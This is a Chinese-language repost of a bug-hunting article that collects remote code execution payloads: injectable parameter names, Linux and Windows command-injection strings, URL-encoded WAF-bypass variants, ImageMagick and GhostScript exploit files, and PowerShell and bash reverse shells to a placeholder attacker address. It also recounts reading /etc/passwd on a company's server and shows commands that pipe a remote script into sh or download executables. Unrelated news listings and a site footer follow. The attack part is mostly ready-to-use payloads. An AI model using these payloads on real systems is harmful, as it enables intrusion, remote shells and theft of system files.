干货 - 漏洞挖掘中RCE漏洞常用的Payload总结

RCE:远程代码执行 (RCE) 使攻击者能够通过注入攻击执行恶意代码。代码注入攻击不同于命令注入攻击。攻击者的能力取决于服务器端解释器的限制。在某些情况下,攻击者可能能够从代码注入升级为命令注入。远程代码评估可能导致易受攻击的 Web 应用程序和 Web 服务器的全面妥协. 需要注意的是,几乎每种编程语言都有代码评估功能。


如何寻找 RCE:


Top 46 RCE 参数 :

exec={payload}
command={payload}
execute{payload}
ping={payload}
include={payload}
exclude={payload}
jump={payload}
code={payload}
reg={payload}
do={payload}
func={payload}
arg={payload}
option={payload}
load={payload}
process={payload}
step={payload}
read={payload}
function={payload}
req={payload}
feature={payload}
exe={payload}
module={payload}
payload={payload}
run={payload}
print={payload}
email={payload}
id={payload}
username={payload}
user={payload}
to={payload}
from={payload}
search={payload}
query={payload}
q={payload}
s={payload}
shopId={payload}
blogId={payload}
phone={payload}
mode={payload}
next={payload}
firstname={payload}
lastname={payload}
locale={payload}
cmd={payload}
sys={payload}
system={payload}


Linux RCE




Payload list:

id
,id
;id
;id;
'id'
"id"
''id
''id''
''id''&
*id
*id*
**id**
(id)
`id`
`id`&
`id` &
;id|
;|id|
|id
|id|
||id
||id|
||id;
|id;
&id
&id&
&&id
&&id&&
^id

转义所有危险字符时的RCE:

%7Cid
%7cid;pwd;uname -a
%26 id %26
%0aid%0a
%0a uname -a %0a
%27%0Awhoami%0A%27
%22%0Awhoami%0A%22
%5C%0Awhoami
%27%27%0Awhoami%0A%27%27
%2A%0Awhoami%0A
%2A%0Awhoami%0A%2A
%28%0Awhoami%0A%29
%60%0Aid%0A%60
%3B%0Awhoami%0A%3B
%2C%0Awhoami%0A%2C
%7C%0Awhoami
%7C%0Awhoami%0A%7C
%0a whoami %0a
%0Acat%20/etc/passwd
%7C%7Cid%0A
%2C%20id
%5Eid
%3Cid
%5Cid
%27%27id
%27%27id%27%27
%27%27id%27%27%26
%2Aid
%2Aid%2A
%2A%2Aid%2A%2A
%28id%29
%60id%60%26
%60id%60%20%26
%29%3Bid
%3Cid%3B
%29%3Bid%3B
%29%3Bid%7C
%29%7Cid
%29%7Cid%3B
%5Cid%3B
%5Cid%7C
%5Cid%5C
%22%20id
%27%20id
%7C%20id
%26%20id
%3B%20id

RCE 过滤 and WAF Bypass:

'
whoami
'"
whoami
"`
whoami
`;
whoami
;,
whoami
,|
whoami|
whoami
|
whoami''
whoami
''*
whoami*
whoami
*(
whoami
)
whoami
&
whoami
&",
system('ls')
;"|uname -a+||a+#'+|ls+-la|a+#|"+|ls+-la||a+#  Rce waf bypass
",system('ls');" double quote Rce filter bypass
${@system("id")} eval code bypass
${@phpinfo()}
;phpinfo();
;phpinfo
;system('cat%20/etc/passwd')
;system('id')
$(id)
;${@print(md5(whoami))}
;${@print(md5("whoami"))}
$;id
$(`cat /etc/passwd`)
{{ get_user_file("/etc/passwd") }}

system('cat /etc/passwd');
<?php system("cat /etc/passwd");?>
php -r 'var_dump(exec("id"));'
/bin$u/bash$u  
cat$u+/etc$u/passwd$u
";cat+/etc/passwd+#
;+$u+cat+/etc$u/passwd$u
;+$u+cat+/etc$u/passwd+#
/???/??t+/???/??ss??
/?in/cat+/et?/passw?
;+cat+/e'tc/pass'wd
cat+/etc/passwd
cat /etc$u/passwd
(sy.(st).em)(whoami);
;cat+/etc/passwd
;cat+/etc/passwd+#
;cat$u+/etc$u/passwd$u
;cat%20/etc/passwd
;cat /e${hahaha}tc/${heywaf}pas${catchthis}swd
;cat$u /etc$u/passwd$u
;{cat,/etc/passwd}
;cat
例子:

'i'd

"i"d

u ame -a

w${u}h${u}o${u}a${u}m${u}i


IFS=];b=cat]/etc/passwd;$b
IFS=,;`cat<<

IFS=,;`cat<<

/*$(id)`id`

/*$(id)`id``*/id’/*$(id)`id` #*/id||’”||id||”/*`*/


反弹shell :

nc -l 1337
curl https://reverse-shell.sh/yourip:1337 | shReverse Shell Generator:
https://www.revshells.com
实战案例

我在一家Top级的公司找到了一个案例:



我检查了include=参数. 它容易受到 rce 的影响


'
whoami && id && uname -a && cat /etc/passwd
'


但是有一个 waf 阻止了我的请求


我用了下面这个payload进行绕过:

'
whoami && id && uname -a && cat /etc/passwd
'

我将payload转换为 url 编码再进行发包:

最终使用的绕过waf的payload如下:

%27%0a%77%68%6f%61%6d%69%20%26%26%20%69%64%20%26%26%20%75%6e%61%6d%65%20%2d%61%20%26%26%20%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%0a%27

成功Rce!



Imagemagick rce:


nc -l -p 1337

另存为 test.gif 或 test.jpg

1.
push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.0/oops.jpg?`echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL3lvdXJpcC95b3VycG9ydCAwPiYx | base64 -d | bash`"||id " )'
pop graphic-context
2.
push graphic-context
encoding "UTF-8"
viewbox 0 0 1 1
affine 1 0 0 1 0 0
push graphic-context
image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/yourip/yourport 0<&1 2>&1'
pop graphic-context
pop graphic-context
3.
%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%ncat yourip yourport -e /bin/sh) currentdevice putdeviceprops
4.
%!PS
userdict /setpagedevice undef
legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%bash -c 'bash -i >& /dev/tcp/yourip/yourport 0>&1') currentdevice putdeviceprops

保存poc.xml:

<?xml version="1.0" standalone="no"?>


GhostScript Rce:

nc -nvlp 1337

保存 test.gif or test.jpg

1.
%!PS
userdict /setpagedevice undef
legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%bash -c 'bash -i >& /dev/tcp/yourip/yourport 0>&1') currentdevice putdeviceprops
2.
%!PS
0 1 300367 {} for
{save restore} stopped {} if
(%pipe%bash -c 'bash -i >& /dev/tcp/yourip/yourport 0>&1') (w) file
3.
%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%bash -c 'bash -i >& /dev/tcp/yourip/yourport 0>&1') currentdevice putdeviceprops
4.
%!PS
userdict /setpagedevice undef
legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%curl http://inputburpcollaborator) currentdevice putdeviceprops
保存 poc.pdf
%!PS
currentdevice null true mark /OutputICCProfile (%pipe%curl http://inputburpcollaborator)
.putdeviceparams
quit


下面这个github项目最适合在上传功能上查找 Rce 错误

https://github.com/modzero/mod0BurpUploadScanner.git



PHPGGC:PHP 通用小工具链:




该工具允许您生成payload,而无需执行查找小工具和组合它们的繁琐步骤。它可以看作是frohoff 的 ysoserial的等价物,但对于 PHP。目前,该工具支持的小工具链包括:CodeIgniter4、Doctrine、Drupal7、Guzzle、Laravel、Magento、Monolog、Phalcon、Podio、Slim、SwiftMailer、Symfony、Wordpress、Yii 和 ZendFramework

这个最适合查找 rce漏洞(框架/库):


https://github.com/ambionics/phpggc


Windows RCE


Payload list:

".system('dir')."
' dir
' || dir
' & dir
' && dir
'; dir
" dir
" || dir
" | dir
" & dir
" && dir
"; dir
dir
$(`dir`)
&&dir
| dir C:
; dir C:
& dir C:
&& dir C:
dir C:
| dir
; dir
& dir
&& dir| ipconfig /all
; ipconfig /all
& ipconfig /all
&& ipconfig /all
ipconfig /all|| phpinfo()
| phpinfo()
 {${phpinfo()}}
;phpinfo()
;phpinfo();//
';phpinfo();//
{${phpinfo()}}
& phpinfo()
&& phpinfo()
phpinfo()
phpinfo();
转义所有危险字符时的RCE payload:
%27%20dir
%27%20%7C%7C%20dir
%27%20%26%20dir
%27%20%26%26%20dir
%27%3B%20dir
%22%20dir
%22%20%7C%7C%20dir
%22%20%7C%20dir
%22%20%26%20dir
%22%20%26%26%20dir
%22%3B%20dir
%22.system%28%27dir%27%29.%22
%24%28%60dir%60%29
%26%26dir
%7C%20dir%20C%3A%5C
%3B%20dir%20C%3A%5C
%26%20dir%20C%3A%5C
%26%26%20dir%20C%3A%5C
dir%20C%3A%5C
%7C%20dir
%3B%20dir
%26%20dir
%26%26%20dir
+dir+c:+|
+|+dir+c:+|
+|+dir+c:%2f+|
dir+c:
||+dir|c:
+|+Dir+c:
+|+Dir+c:%255c
+|+Dir+c:%2f
$+|+Dir+c:
$+|+Dir+c:%255c
$+|+Dir+c:%2f
%26%26+|+dir c:
%0a+dir+c:
%26%26+|+dir c:%2f
$%26%26dir+c:%2f
%0a+dir+c:%2f
%0a+dir+c:%255c
$%26%26dir c:
%26%26+|+dir c:%255c
$%26%26dir+c:%255c
%20{${phpinfo()}}

反弹shell:

nc -nvlp 443

powershell -c "$client = New-Object System.Net.Sockets.TCPClient('your ip',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i =
$stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.T
ext.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII
).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$c
lient.Close()"
or
powershell -NoP -NonI -W Hidden -Exec Bypass "& {$ps=$false;$hostip='your ip';$port=443;$client = New-Object System.Net.Sockets.TCPClient($hostip,$port);$stream = $client.GetStream();[byte[]]$bytes = 0..50000|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$cmd=(get-childitem Env:ComSpec).value;$inArray=$data.split();$item=$inArray[0];if(($item -eq '$ps') -and ($ps -eq $false)){$ps=$true}if($item -like '?:'){$item='d:'}$myArray=@('cd','exit','d:','pwd','ls','ps','rm','cp','mv','cat');$do=$false;foreach ($i in $myArray){if($item -eq $i){$do=$true}}if($do -or $ps){$sendback=( iex $data 2>&1 |Out-String)}else{$data2='/c '+$data;$sendback = ( &$cmd $data2 2>&1 | Out-String)};if($ps){$prompt='PS ' + (pwd).Path}else{$prompt=(pwd).Path}$sendback2 = $data + $sendback + $prompt + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()}"
反弹shell生成器:
https://www.revshells.com
文件下载:
powershell -c "(new-object System.Net.WebClient).DownloadFile('https://eternallybored.org/misc/wget/1.21.1/64/wget.exe','C:UsersadminDesktopwget.exe')"
powershell iwr -uri http://10.10.16.97:8000/chisel.exe -outfile ch.exe # also works in PS ConstrainLanguageMode


Rce(Unix 和 windows)的最佳 burpsuite 扩展:

https://github.com/ewilded/shelling


最佳的命令注入利用工具:

https://github.com/commixproject/commix


Happy Hacking!


文章转自HACK学习呀

文章来源:

https://ansar0047.medium.com/remote-code-execution-unix-and-windows-4ed3367158b3

展开阅读全文

页面更新:2024-03-13

标签:等价物   组合   干货   攻击者   生成器   不同于   漏洞   命令   常用   代码   功能   工具   文章

1 2 3 4 5

Linux下Django框架的搭建(二)

此为Django框架搭建的第二部分。第一部分详见上篇文章6、CentOS中部署虚拟环境(1)安装虚拟环境#升级pip[root@fangel ~]# /usr/local/python-3.9.10/bin/python3.9 -m pip install --upgrade pip#安装虚拟环境[root@fan

FTX 已经完成-比特币、山寨币和加密货币的下一步是什么?

FTX 消失了,看起来许多集中式加密平台将随之消失。但是有一线希望吗?2022 年对加密货币来说是艰难的一年,11 月对投Z者和J易员来说尤其艰难。虽然这对许多人来说是极其痛苦的,但从长远来看,FTX 的崩溃和随之而来的可能会拖

萨尔瓦多总统宣布国家将每天购买一个比特币称 FTX 是 BTC 的“对立面

萨尔瓦多总统纳伊布·布克勒 (Nayib Bukele) 仍在购买比特币 ( BTC ),尽管经历了加密货币冬季,加密货币之王从历史高位暴跌了 75% 以上。在 Twitter 上,Bukele 最近宣布他的国家将开始每天购买一个 BTC。“从明天开始,我

宁德时代:动力电池巨头“宁王”的发展史(二)

3.曾毓群的第三次豪赌,终成“宁王”:随后,手机等消费级数码产品快速发展,锂电池行业迎来了春天,这股潮流还延伸至长期被传统燃料掌控的汽车产业。看到电动车领域的发展机会,2008年,在曾毓群的主导下,ATL设立了动力电池部门。

华为WATCH 3 Pro new支持手表独立打岔,带来高效便携出行体验

在如今手表市场当中,各款智能手表层出不穷,已经有了逐渐取代机械手表的趋势,其丰富的功能让很多用户都对其感到新颖和独特。而近期让大家赶到惊喜的是,华为WATCH 3 Pro new手表添加了一个强大的功能,手表支持独立打车服务

虎牙乱“啃”元宇宙

撰文 | 文烨豪 编辑 | 吴先之 从陆续倒下的熊猫TV、龙珠直播,再到今年关停的企鹅电竞,自千播大战停息以来,直播赛道陷入了大逃杀的局面。其中,虎牙作为幸存者,近些年一直在同亏损抗争。 北京时间11月15日,虎牙公布了2022年

iOS16.1.1获得骨灰级果粉认可!5G信号很强,续航太顶

最近不少粉丝都在问iOS16系统哪个版本各方面表现都更稳定一些?想找个系统进行养老了,个人认为如果追求极致稳定,那么是可以选择iOS16.1.1的,今天给大家分享一款iPhone12Pro Max时间iOS16.1.1的体验感受,附升级建议。因为iO

渭南成功跻身“独角兽企业”城市圈

作者:刘亦农(渭南师院退休副教授) 渭南城区风光(图片来自网络)独角兽企业意指:成立于2000年之后,价值10亿美元以上,且没有上市的民营企业。独角兽企业被视为新经济发展的一个重要风向标,它主要集中在高新技术领域,互联网领域尤

月度经济观察丨10月份我国就业形势总体稳定 居民消费价格温和上涨

央广网北京11月21日消息(记者唐婧 李程)今年以来,尽管经济下行压力较大,但是稳就业政策持续发力,就业形势保持了基本平稳。国家统计局发布的数据显示,今年1-10月份,全国城镇调查失业率平均值为5.6%。从单月来看,10月份的全国

24小时自习室里,这些“独行侠”为梦想而来

视频加载中...现代快报讯(记者 龙秋利 史童歌 冯茜)位于南京市建邺区雨润大街的一座图书馆,有个24小时自习室。早上6点刚过,多扇玻璃门拉开,大家进去时稍显嘈杂,后面很快安静下来。△免费自习室从早“火”到晚时间在这里走

爆笑神回复:你跟同桌干过最牛的事是什么?

欢迎您来看我哦喜欢的话记得点赞加关注呦么么哒[比心]当你把眼镜摘下来后,和朋友坐在餐桌上一起吃饭学会了[偷笑]筷子拿的越远嫁的越远[灵光一闪]咱妈[大笑]为什么呢?你跟同桌干过最牛的事是什么?女友最常显露的两个状态

汪小菲该不该给大S家交电费?

离婚、再婚都要各自做好各自的事情,付好各自的账单。@可可霏​ 说起大S、汪小菲这对抓马夫妻,从结婚到离婚到再结婚就一直活跃在大家视线中,今早又一个措手不及上了热搜。 这场闹剧一直持续了一下午,从汪小菲拒给抚养费

海珠封控区服装人现状(个人观点)

首先申明:我是一个在广东的湖北人,但是不在封控区内。我有亲戚大概30人左右现在封在疫区,我们村大概有300多人的群体被封在里面。以下内容是根据村内部群和家族内部群了解到的疫区内部情况,不是官方消息。1 疫区的人员构

湖北民政局轮播了一篇小学生的作文:我与后妈一起生活的日子

爸妈离婚,我跟了爸爸。爸爸说他不会再找人了,怕我受委屈。妈妈走了,走的时候抱着我哭了又哭说了无数个对不起, 她说等她有能力了一定来接我走。后来爸爸恋爱了,他带我去见阿姨,阿姨对我很好。保证不会让我受委屈,会一直对我

师说 - 家长怎样成为孩子的良师益友

作为孩子的第一任老师,家长该如何科学地引导孩子?在教育孩子的时候,家长又该怎样正确地使用表扬、鼓励、批评和惩罚呢?本期《师说》我们邀请到了知子花教育机构创始人、清华积极心理指导师,曹廷珲老师。曹廷珲老师20年专注
上滑加载更多 ↓
推荐阅读:

马斯克亲自过问代码;因虚假创业被判坐牢11年 - 中英双

华为Pocket S小折叠屏手机,功能强大,带来时尚新选择

GPU 识别工具 CPU-Z 2.51.0 发布:全面支持英伟达 RTX 4

央行广州分行:“三张清单”力促政策性开发性金融工具在

Edge浏览器,隐藏的实用功能盘点

华为手机竟隐藏4种扫描仪功能,扫描文件再也不用去打印

续航位列折叠屏第一,首创健康护眼功能,荣耀 Magic Vs 惊

5年1.43亿!8项数据稳中有进!嘴哥尽力了,3.22亿巨头组合成

100个Java工具类之2:字符串之多种个性化格式处理

暧昧不同于爱情,要注意分辨

友情链接:
更多:

本站资料均由网友自行发布提供,仅用于学习交流。如有版权问题,请与我联系,QQ:4156828  

© CopyRight 2020-2024 All Rights Reserved. Powered By 71396.com 闽ICP备11008920号-4
闽公网安备35020302034903号

Top